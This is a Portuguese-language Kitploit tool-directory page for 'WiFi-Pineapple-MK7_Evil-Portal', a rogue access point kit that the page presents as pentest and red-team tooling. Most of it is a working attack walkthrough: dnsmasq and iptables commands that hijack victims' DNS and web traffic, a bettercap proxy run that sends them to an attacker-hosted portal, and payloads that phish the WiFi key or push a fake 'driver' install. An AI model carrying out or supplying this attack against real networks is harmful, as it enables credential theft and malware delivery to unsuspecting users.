Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WiFi-Pineapple-MK7_Evil-Portal — Kit de ponto de acesso fraudulento para testes de penetração WiFi, implantando payloads de phishing de portal malicioso para capturar credenciais e realizar ataques de engenharia social em redes sem fio. | Kitploit
Ferramentas/GitHubGitHub/tw-d/wifi-pineapple-mk7_evil-portal
Auditoria de Wi-FiPhishingSegurança Sem FioTestes de PenetraçãoEngenharia SocialRed Teaming
GitHubtw-d/wifi-pineapple-mk7_evil-portal

WiFi-Pineapple-MK7_Evil-Portal

Kit de ponto de acesso fraudulento para testes de penetração WiFi, implantando payloads de phishing de portal malicioso para capturar credenciais e realizar ataques de engenharia social em redes sem fio.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
11há 2 anosAinda não revisado

WIFI PINEAPPLE MARK VII - PORTAL MALIGNO

  • O principal ponto de acesso rogue e kit de ferramentas de pentest WiFi para operações de acesso próximo.
  • Ataques passivos e ativos analisam dispositivos vulneráveis e mal configurados.
  • https://hak5.org/collections/sale/products/wifi-pineapple

Autor:: TW-D

Versão:: 1.0.0

Copyright:: Copyright (c) 2024 TW-D

Licença:: Distribuído sob os mesmos termos do Ruby

Requer:: PHP >= 8.1, Ruby >= 2.7.0p0 e WiFi Pineapple Mark VII 2.1.3-stable

Instalação (Distribuições Linux Baseadas em Debian)::

  • sudo apt-get install php8.1-cli php8.1-curl

  • sudo apt-get install build-essential ruby ruby-dev libpcap-dev

  • sudo gem install sorted_set bettercap

Descrição

Um portal maligno é uma técnica usada para enganar usuários de uma rede Wi-Fi, redirecionando-os para uma página da web maliciosa em vez da página de autenticação ou página inicial esperada.

Nota : "Issues" e "Pull Requests" são bem-vindos.

Testado Em

Sistema Operacional com/sem Navegador WebTipo de Notificação
Ubuntu 22.04Nenhum
Android 8.0.0Sistema
Microsoft Windows 10Nenhum
Raspberry Pi bookwormNenhum
Ubuntu 22.04 com Mozilla FirefoxAlerta
Microsoft Windows 10 com Mozilla FirefoxAlerta
Raspberry Pi bookworm com Mozilla FirefoxAlerta

Configuração

Hacker - Conectando ao WiFi Pineapple

Conecte o WiFi Pineapple ao seu computador via cabo USB-C.

WiFi Pineapple - Interface Web

Configurações > Rede > Modo Cliente Wireless: A interface wlan2 deve estar desconectada.

Hacker - Terminal 1

root@kitploit:~
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
        inet 172.16.42.100  netmask 255.255.255.0  broadcast 172.16.42.255
[...]

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE  SERVICE
53/tcp   open   domain
5353/tcp closed mdns
53/udp   open   domain
5353/udp closed zeroconf
[...]

hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE SERVICE
53/tcp   open  domain
5353/tcp open  mdns
53/udp   open  domain
5353/udp open  zeroconf
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000

Hacker - Terminal 2

root@kitploit:~
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/

Hacker - Terminal 3 (Opcional)

root@kitploit:~
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate

hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

hacker@hacker-computer:~$ exit

Usando e Carregando Payloads

No diretório "./payloads/", você encontrará:

DESENVOLVIMENTOAutorDescriçãoComo usar
skeleton.htmlTW-DPayload vazio destinado ao desenvolvimento.Documentação
EXECUÇÃOAutorDescriçãoComo usar
web-camera.htmlTW-DSimula um vídeo de vigilância falso e exige a instalação de um driver para seu funcionamento.Documentação

web-camera

PHISHINGAutorDescriçãoComo usar
wifi_security-key.htmlTW-DSimula uma atualização falsa do equipamento de Internet e exige a chave de segurança WiFi para continuar.Documentação

wifi_security-key

Baixar ferramenta